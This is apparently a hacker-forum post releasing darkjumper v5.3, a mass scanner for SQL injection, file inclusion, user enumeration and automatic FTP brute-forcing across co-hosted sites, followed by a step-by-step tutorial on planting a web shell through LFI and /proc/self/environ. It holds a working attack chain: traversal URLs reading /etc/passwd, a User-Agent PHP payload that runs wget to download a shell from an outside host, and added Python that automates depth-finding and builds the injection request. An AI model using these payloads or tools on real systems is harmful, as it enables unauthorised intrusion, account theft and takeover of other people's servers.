break a time, with break the c0de…


DARKJUMPER V5.3 RELEASED, WITH TUTORIAL, BY GUNSLINGER_


After darkjumper v4.0 was put together by my big brother, mywisdom, he and I developed darkjumper v5.0 (now v5.3) and added more functions to it.
With this post I release the tool along with a short tutorial on how to use it and what is new in this version.

Toolname     : darkjumper.py v5.3
Developed by : mywisdom & gunslinger_ <devilzc0de.com c0der>
Released on  : 15 February 2010
Download url : https://sourceforge.net/projects/darkjumper/

Function(s)
1. User enumeration: guesses usernames of 4-8 characters derived from every site name hosted on the same server
2. Scans for SQL injection, local file inclusion, remote file inclusion and blind SQL injection on every site hosted on the same server
3. CGI and path scanning
4. Port scanning
5. Automatic brute-forcing after user enumeration
6. Autoinjector / automatic column finder (MySQL), run when a MySQL error is found
7. Proxy support
8. Verbosity option
9. IP or proxy checker with GeoIP, useful for checking whether your IP or your proxy is working

Additional feature: more fake HTTP user agents
Requirement(s): - python : 2.5.x
		- perl

Now on to the tutorial section:

Before scanning: always clear the log before a scan by running clearlog.py

./clearlog.py

All right folks, now we are ready to run darkjumper and show its options with

./darkjumper.py -h

or

./darkjumper.py --help

and we get the help screen (the full -h output of the v5.0 help module is reproduced at the end of this post).

In this version we have 6 modes:
reverseonly				| Only reverse the target, no vulnerability checking
surface					| Check for sqli and blind sqli on every web site hosted on the same target server
full					| Check for sqli, blind, rfi and lfi on every web site hosted on the same target server
cgidirs					| Scan for CGI directories on the target server
enum [number] 				| Guess possible usernames on the server (4-8 character user enumeration)
portscan [startport]-[endport]		| Scan for open ports on the target server

Here is the full description of each mode.

– reverseonly
In this mode darkjumper only does a reverse IP lookup of the target (it lists the other sites hosted on the same IP) and checks no vulnerabilities.
The command is:

./darkjumper.py -t [target] -m reverseonly

Example :

– surface
In this mode darkjumper reverses the target, then checks for sqli (SQL injection) and blind (blind SQL injection) on every web site hosted on the same target server.
The good news from this version on: when we get a MySQL-type error, we also try to find the number of columns automatically. Phew!
The command is:

./darkjumper.py -t [target] -m surface

Example :

– full
In this mode darkjumper reverses the target, then checks CGI paths and checks for sqli (SQL injection), blind (blind SQL injection), lfi (local file inclusion) and rfi (remote file inclusion) on every web site hosted on the same target server. The autoinjector / automatic column finder also works in this mode when we get a MySQL error. This mode takes considerably longer, so it is not a good choice on a slow connection.
The command is:

./darkjumper.py -t [target] -m full

Example :

– cgidirs
In this mode darkjumper only checks CGI paths on your target.

The command is:

./darkjumper.py -t [target] -m cgidirs

Example :

– enum
In this mode darkjumper reverses the target, then guesses possible usernames on the server (4-8 character user enumeration). [number] is the length of the guessed usernames and must be between 4 and 8; if you leave it out, the help text says guessing defaults to 8 characters.

The command is:

./darkjumper.py -t [target] -m enum [number]

Example command:

./darkjumper.py -t [target] -m enum 4

Example :

Note: you can enable automatic FTP brute-forcing of the guessed users by adding -a:

./darkjumper.py -t [target] -m enum [number] -a 

(the -a argument turns on automatic FTP brute-forcing)

Example :

– portscan
In this mode darkjumper only checks for open ports on your target.
The command is:

./darkjumper.py -t [target] -m portscan [startport]-[endport]

Example command :

./darkjumper.py -t localhost -m portscan 15-22

Example :

You can make it verbose with -v:

./darkjumper.py -t localhost -m portscan 15-22 -v

Example :
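The enum and portscan modes above come down to two small pieces of logic: turning the site names returned by the reverse lookup into username guesses of a chosen length, and parsing and scanning a [startport]-[endport] range. The following is an added example written for this post, not darkjumper's own code (which is Python 2.5 and is not shown here). It is Python 3 and assumes, since the tool's description does not spell it out, that a shared-hosting username is the first N characters of a site's second-level label (the usual cPanel naming), and that the port probe is a plain TCP connect with a timeout. The probe is injectable so the scan logic can be exercised without a network.

```python
"""Helpers in the spirit of darkjumper's enum and portscan modes.

Added example, not darkjumper's own code. Assumes (not stated on the page)
that shared-hosting usernames are the first N characters of a site's
second-level label, which is how cPanel-style accounts are often named.
"""
import re
import socket
from typing import Callable, Iterable, List, Tuple

MIN_CHARS, MAX_CHARS = 4, 8  # the enum mode's allowed range


def site_label(hostname: str) -> str:
    """Second-level label of a hostname: www.jasakom.com -> jasakom.

    Simplification: public suffixes such as co.uk are not handled.
    """
    parts = hostname.lower().strip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    return re.sub(r"[^a-z0-9]", "", label)


def username_candidates(sites: Iterable[str], chars: int = MAX_CHARS) -> List[str]:
    """Guess usernames of up to `chars` characters from the site names on a host."""
    if not MIN_CHARS <= chars <= MAX_CHARS:
        raise ValueError(f"chars must be {MIN_CHARS}..{MAX_CHARS}, got {chars}")
    seen, out = set(), []
    for site in sites:
        label = site_label(site)
        if len(label) < MIN_CHARS:
            continue  # too short to be a useful guess
        guess = label[:chars]  # assumption: account name = truncated site label
        if guess not in seen:
            seen.add(guess)
            out.append(guess)
    return out


def parse_port_range(spec: str) -> Tuple[int, int]:
    """Parse darkjumper's [startport]-[endport] syntax, e.g. '15-22'."""
    m = re.fullmatch(r"(\d{1,5})-(\d{1,5})", spec.strip())
    if not m:
        raise ValueError(f"bad port range {spec!r}, expected start-end")
    start, end = int(m.group(1)), int(m.group(2))
    if not (0 <= start <= end <= 65535):
        raise ValueError(f"port range {spec!r} out of order or outside 0-65535")
    return start, end


def tcp_connect(host: str, port: int, timeout: float) -> bool:
    """Real probe: True if a TCP connect to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan_ports(host: str, spec: str, timeout: float = 0.5,
               probe: Callable[[str, int, float], bool] = tcp_connect) -> List[int]:
    """TCP connect scan of the ports in `spec`; `probe` is injectable for tests."""
    start, end = parse_port_range(spec)
    return [p for p in range(start, end + 1) if probe(host, p, timeout)]


if __name__ == "__main__":
    # Constructed sample: vhosts you might get back from a reverse-IP lookup.
    vhosts = ["www.jasakom.com", "jasakom.com", "blog.example-site.net", "a.b"]
    print(username_candidates(vhosts, 4))   # ['jasa', 'exam']
    print(scan_ports("127.0.0.1", "15-22"))  # open ports on localhost, if any
```

Run it directly to print the guesses for a few constructed host names and scan 15-22 on localhost. The 4-8 bound and the start-end ordering are validated rather than assumed, which is the check behind the tool's own warning about the number range.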

You can also check your own IP and your proxy.
To check a proxy the command is

./darkjumper.py -p [proxyaddress:port]

and to check your own IP address

./darkjumper.py -c 

Want to stop a scan? Simply run this command:
killall -9 /usr/bin/python & killall -9 /usr/bin/perl
Note that the single & runs the first killall in the background instead of chaining the two commands (use ; or &&), and that this kills every python and perl process on the box, not only darkjumper; pkill -f darkjumper.py is a more targeted way to stop the Python process.

All right guys, that's it! Hopefully you enjoy it!
Don't forget to check for the latest version or report bugs at https://sourceforge.net/projects/darkjumper/


Coming soon!! darkjumper.py v5.0, just wait and see baby!!

################################################################
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################
Darkjumper.py version 5.0 help module
Developed by : mywisdom  & gunslinger_
This tool will try to find every website that host at the same server at your target
Then check for every vulnerability of each website that host at the same server
Vulnerable check including: sqli,blind,lfi and rfi
-----------------------------------------------------------------------------------

Usage : ./darkjumper.py -t [target] -m [option]
	Available option :
		reverseonly
		surface
		full
		cgidirs
		enum [number] 
		     [number] is 4, 5, 6, 7, 8 in range
		portscan [startport]-[endport]

Description:
- reverseonly
	Only reverse target no checking bug
- surface
	Reverse target, then checking for sqli and blind sqli on every web that host at the same server
- full
	Reverse target, then checking for sqli,blind,rfi,lfi on every web that host at the same server
	[this mode requires longer time,I dont suggest this mode for slow internet connection]
- enum
	Guessing possible user enumeration on server (4-8 chars user enumeration)
	If you don't set number this will guesssing default to 8 chars
	[this mode requires number 4 until 8 for guessing users]
- portscan
	Scanning open port on server
- cgidirs
	Scanning cgidirs on the server
----------------------
Sample Usage:
----------------------
Reverseonly mode :
	Example : ./darkjumper.py -t www.jasakom.com -m reverseonly
Surface scanning mode :
	Example : ./darkjumper.py -t www.jasakom.com -m surface
Full scanning mode:
	Example : ./darkjumper.py -t www.jasakom.com -m full
User enumeration mode :
	Example : ./darkjumper.py -t www.jasakom.com -m enum 8
		Warning ! you must set the number of chars for user enumeration
		If you want to set number of chars for user guessing,it should be 4 until 8 ! don't less or greater 
CGI directory scanning mode :
	Example : ./darkjumper.py -t www.jasakom.com -m cgidirs
Port scanning mode:
	Example : ./darkjumper.py -t www.jasakom.com -m portscan 0-80
----------------------------------------------------------


How to plant a shell through LFI (Local File Inclusion) with the /proc/self/environ method

Author: gunslinger_

In this tutorial I will explain how to get a shell on the target server through LFI using the /proc/self/environ method.
OK, let's get straight to it.

1. We find a website that is vulnerable to LFI.

Example: http://site.com/info.php?file=news.php

2. Let's replace "news.php" with "../../../".

Example: http://site.com/info.php?file=../../../

Then we get an error like the following:

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

OK, it looks like we have a chance to make the include read another file.
Next we try to reach /etc/passwd.

Example: http://site.com/info.php?file=etc/passwd

But we still get an error like this:

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

What if we go up more directories?
Let's try it. Each ../ climbs one directory, and ../ at the filesystem root stays at the root, so a chain longer than strictly needed still works wherever the script lives:

Example: http://site.com/info.php?file=../../../../../../../../../etc/passwd

There we go: we have /etc/passwd, which looks like this:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. Let's check whether we can read /proc/self/environ.
Now replace "/etc/passwd" with "/proc/self/environ":

Example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ

If you get something like this:

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Then /proc/self/environ is readable!
It works because the file is the environment of the process that is serving this very request: when PHP runs as CGI/FastCGI (note GATEWAY_INTERFACE=CGI/1.1 above), the web server exports the request headers into that environment as HTTP_* variables, so whatever we send in User-Agent ends up inside the file being included.
If you get a blank page, /proc/self/environ cannot be read, or the target may be running a *BSD system (where procfs is usually not mounted).

4. Now let's inject malicious code by poisoning the HTTP header. How do we inject it? We can use the Tamper Data add-on for Firefox.
You can download it here: https://addons.mozilla.org/en-US/firefox/addon/966
Open Tamper Data in Firefox, then request the /proc/self/environ URL from before, "http://site.com/info.php?file=../../../../../../../../../proc/self/environ",
and set the User-Agent of that request to the following code:

<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

or

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

then submit.

The header must be sent on the same request that includes /proc/self/environ, since that is the request whose environment gets parsed as PHP. The payload uses the <? short open tag, which needs short_open_tag enabled; if it is off, use <?php instead. It also needs wget on the server and a directory the web server user can write to.

5. If the injection succeeded, the shell will be at a location like this:

http://site.com/shell.php

(wget writes shell.php relative to the working directory of the PHP process, normally the directory of the included script, here /home/gunslinger/public_html, which is why it shows up at the site root.)
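The five steps above, as an added example that is not part of the original post: a Python 3 script that generates the ../ traversal chain, classifies the three kinds of response seen in the tutorial (include error, /etc/passwd contents, /proc/self/environ contents), finds the first working depth, and builds the step 4 request with the PHP payload in the User-Agent header. No request is sent: the server is replaced by a constructed stand-in that answers the way site.com does in the tutorial, and the endpoint http://site.com/info.php with parameter file is taken from the page. The demo payload is a harmless system('id') instead of the page's wget line; the depth limit of 10 and the stand-in's answering depth of 9 are assumptions made for the example.

```python
"""Walk-through of the /proc/self/environ LFI technique, as an added example
(not gunslinger_'s code). No request is sent: the HTTP exchange is modelled
with constructed response bodies so the logic runs offline. The depth limit
and the stand-in server's behaviour are assumptions for illustration.
"""
import re
import urllib.request
from typing import Callable, List, Optional

# Markers that tell the three responses in the tutorial apart.
PASSWD_RE = re.compile(r"^root:x:0:0:", re.M)
ENVIRON_RE = re.compile(r"\bHTTP_USER_AGENT=")
INCLUDE_ERR_RE = re.compile(r"Warning: include\(.*?\).*failed to open stream")


def traversal_payloads(target: str, depth_max: int = 10) -> List[str]:
    """'../' * 1..depth_max + target, in the order the tutorial probes them."""
    target = target.lstrip("/")  # the tutorial's 'etc/passwd' form
    return [("../" * d) + target for d in range(1, depth_max + 1)]


def classify(body: str) -> str:
    """Classify a response body the way the tutorial does by eye."""
    if PASSWD_RE.search(body):
        return "passwd"          # step 2 succeeded: arbitrary file read
    if ENVIRON_RE.search(body):
        return "environ"         # step 3 succeeded: request headers are in the file
    if INCLUDE_ERR_RE.search(body):
        return "include-error"   # wrong depth or missing file, keep probing
    return "blank"               # step 3 note: environ unreadable, or *BSD


def find_depth(fetch: Callable[[str], str], base: str, param: str,
               target: str, depth_max: int = 10) -> Optional[int]:
    """Return the first '../' depth at which `target` is readable via `param`."""
    for depth, payload in enumerate(traversal_payloads(target, depth_max), start=1):
        body = fetch(f"{base}?{param}={payload}")
        if classify(body) in ("passwd", "environ"):
            return depth
    return None


def build_injection(base: str, param: str, depth: int, php: str) -> urllib.request.Request:
    """Step 4: include /proc/self/environ with PHP code carried in the User-Agent.

    The page does this with Tamper Data; this builds the same request in code.
    The request is returned, not sent.
    """
    payload = ("../" * depth) + "proc/self/environ"
    return urllib.request.Request(f"{base}?{param}={payload}", headers={"User-Agent": php})


# Constructed sample bodies standing in for the server's three kinds of answer.
SAMPLE_BODIES = {
    "error": "Warning: include(../../../) [function.include]: failed to open stream: "
             "No such file or directory in /home/gunslinger/public_html/info.php on line 99",
    "passwd": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n",
    "environ": "DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 "
               "HTTP_USER_AGENT=Mozilla/5.0 REMOTE_ADDR=6x.1xx.4x.1xx",
}


def fake_server(url: str, reachable_depth: int = 9) -> str:
    """Offline stand-in for site.com: the file is served once the chain reaches /."""
    m = re.search(r"=((?:\.\./)+)(.*)$", url)
    depth = m.group(1).count("../") if m else 0
    if depth < reachable_depth:
        return SAMPLE_BODIES["error"]
    return SAMPLE_BODIES["environ"] if m.group(2).endswith("environ") else SAMPLE_BODIES["passwd"]


if __name__ == "__main__":
    base, param = "http://site.com/info.php", "file"  # endpoint from the tutorial
    depth = find_depth(fake_server, base, param, "etc/passwd")
    print("traversal depth:", depth)                        # 9
    env = fake_server(f"{base}?{param}={'../' * depth}proc/self/environ")
    print("environ readable:", classify(env) == "environ")  # True
    req = build_injection(base, param, depth, "<?php system('id'); ?>")  # harmless demo payload
    print(req.full_url, "| User-Agent:", req.get_header("User-agent"))
```

Swap fake_server for a real fetch function to use it against a test box you own; classify() is also a usable server-side check when reviewing access logs or responses for the same probing pattern.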

Happy hacking!